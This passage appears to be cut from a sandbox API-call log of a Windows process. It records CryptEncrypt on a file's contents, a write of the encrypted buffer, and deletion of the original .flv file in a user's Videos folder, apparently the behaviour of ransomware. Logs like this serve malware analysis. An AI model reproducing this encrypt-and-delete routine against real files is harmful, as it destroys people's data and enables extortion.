hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0100.335] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0100.335] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0100.335] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0100.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0100.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0100.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0100.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0100.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0100.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0100.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0100.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0100.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0100.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0100.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0100.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0100.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0100.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0100.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0100.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0100.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0100.336] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0100.336] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.336] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0100.336] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.336] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0100.337] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x18f4f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x18f50) returned 1 [0100.337] CharLowerBuffW (in: lpsz="byte[102225]", cchLength=0xc | out: lpsz="byte[102225]") returned 0xc [0100.337] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.337] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca790, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0100.337] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b2f60*, pdwDataLen=0x144e538*=0x18f4f, dwBufLen=0x18f50 | out: pbData=0x49b2f60*, pdwDataLen=0x144e538*=0x18f50) returned 1 [0100.337] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0100.338] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0100.338] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.339] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x18f50, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0x18f50, lpOverlapped=0x0) returned 1 [0100.390] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0100.390] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.390] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca610, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0100.391] CryptDestroyKey (hKey=0x41ac740) returned 1 [0100.391] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0100.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0100.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.391] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0100.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0100.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.391] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.391] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0100.391] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0100.391] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0100.391] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.391] FreeLibrary (hLibModule=0x756e0000) returned 1 [0100.391] CloseHandle (hObject=0x298) returned 1 [0100.395] CloseHandle (hObject=0x258) returned 1 [0100.399] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\rggg9G4RHZvsA0kg01.flv", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\rggg9G4RHZvsA0kg01.flv", lpFilePart=0x0) returned 0x3c [0100.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0100.400] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\rggg9G4RHZvsA0kg01.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\rggg9g4rhzvsa0kg01.flv")) returned 0x20 [0100.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0100.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0100.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0100.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0100.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0100.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0100.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0100.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0100.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0100.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0100.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0100.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a088 [0100.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0100.400] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\rggg9G4RHZvsA0kg01.flv", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40a712c0, ftCreationTime.dwHighDateTime=0x1d5e934, ftLastAccessTime.dwLowDateTime=0x5c377970, ftLastAccessTime.dwHighDateTime=0x1d5e278, ftLastWriteTime.dwLowDateTime=0x5c377970, ftLastWriteTime.dwHighDateTime=0x1d5e278, nFileSizeHigh=0x0, nFileSizeLow=0x18f4f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="rggg9G4RHZvsA0kg01.flv", cAlternateFileName="RGGG9G~1.FLV")) returned 0x41ac500 [0100.400] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\rggg9G4RHZvsA0kg01.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\rggg9g4rhzvsa0kg01.flv")) returned 1 [0100.402] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40a712c0, ftCreationTime.dwHighDateTime=0x1d5e934, ftLastAccessTime.dwLowDateTime=0x5c377970, ftLastAccessTime.dwHighDateTime=0x1d5e278, ftLastWriteTime.dwLowDateTime=0x5c377970, ftLastWriteTime.dwHighDateTime=0x1d5e278, nFileSizeHigh=0x0, nFileSizeLow=0x18f4f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="rggg9G4RHZvsA0kg01.flv", cAlternateFileName="RGGG9G~1.FLV")) returned 0 [0100.403] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0100.403] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0100.403] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf400 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4181bc8 | out: hHeap=0x1780000) returned 1 [0100.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0100.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0100.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0100.404] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0100.404] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0100.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0100.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0100.404] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0100.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0100.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0100.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0100.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0100.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0100.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0100.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0100.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0100.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0100.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0100.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0100.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0100.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c68 [0100.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0100.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0100.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0100.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0100.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5a98 [0100.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c68 | out: hHeap=0x1780000) returned 1 [0100.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0100.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0100.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0100.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0100.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d10 [0100.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0100.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0100.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0100.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0100.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0100.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0100.405] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0100.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0100.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0100.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0100.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0100.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0100.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0100.405] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0100.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0100.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0100.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0100.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0100.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0100.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0100.405] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\wJA95KXdyH.flv", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d4304b0, ftCreationTime.dwHighDateTime=0x1d5ead7, ftLastAccessTime.dwLowDateTime=0xed3a4300, ftLastAccessTime.dwHighDateTime=0x1d5e933, ftLastWriteTime.dwLowDateTime=0xed3a4300, ftLastWriteTime.dwHighDateTime=0x1d5e933, nFileSizeHigh=0x0, nFileSizeLow=0x400f, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="wJA95KXdyH.flv", cAlternateFileName="WJA95K~1.FLV")) returned 0x41ac500 [0100.405] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0100.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0100.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0100.406] HeapFree (in: 